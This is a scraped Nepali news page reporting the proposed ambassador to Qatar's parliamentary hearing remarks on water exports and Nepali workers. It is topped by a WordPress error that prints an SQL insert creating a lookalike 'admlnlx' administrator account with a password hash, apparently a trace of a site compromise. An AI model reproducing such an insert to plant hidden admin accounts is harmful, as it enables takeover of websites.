WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQeHMER3gQH72lJMX46lUNjTMv.U4W.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 07:52:28', '', 'admlnlx', 'admlnlx')

कतारमा नेपालको स्वाच्छ पानी बेच्न सकिन्छ : प्रस्तावित राजदूत भारद्वाज – Gaule Khabar

कतारमा नेपालको स्वाच्छ पानी बेच्न सकिन्छ : प्रस्तावित राजदूत भारद्वाज

कतारमा नेपालको स्वाच्छ पानी बेच्न सकिन्छ : प्रस्तावित राजदूत भारद्वाज

गाउँले न्युज, २३ असार, काठमाडौं । नेपालको हिमालबाट आएक स्वाच्छ पानी कतारलाई बेच्न सकिने कतारका लागि प्रस्तावित नेपाली राजदूत नारदनाथ भारद्वाजले बताएका छन् । संसदीय सुनुवाई समितिमा सोमबार सांसदहरुको प्रश्नको जवाफ दिँदै उनले सो कुरा बताएका हुन् ।
भारद्वाजले कतारमा पानीको अभाव भएको तर हाम्रो हिमालमा भएको स्वच्छ पानीलाई कतार लान सक्ने सम्भावना रहेको बताए ।
कार्यक्रममा भारद्वाजले कतारी जेल र कोमामा रहेका नेपालीहरु लाई छुटाउने वा सजाय कम गर्न पहल गर्ने पनि बताए । साथै घाइते र अशक्तको समस्या समाधानका लागि कुटनीतिक पहल गर्ने र अशक्तलाई नेपालमै ल्याएर उपचार गर्नका लागि पहल गर्ने पनि प्रतिवद्धता जनाए ।
कतारमा नेपाली कामदारलाई सम्मानजनक रोजगारी दिलाउन प्रत्यत्न गर्ने र दक्ष कामदार मात्रै जाने वातावरण बनाउन पहल गर्ने पनि उनले उल्लेख गरे ।
समग्रमा दुई देशबीचको सम्बन्धलाई जनस्तरसम्म कायम गर्न पहल गर्ने उनको भनाइ छ । नेपालमा कतारको लगानी भित्र्याउन र पर्यटनलाई पनि प्राथमिकतामा राख्ने उनले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका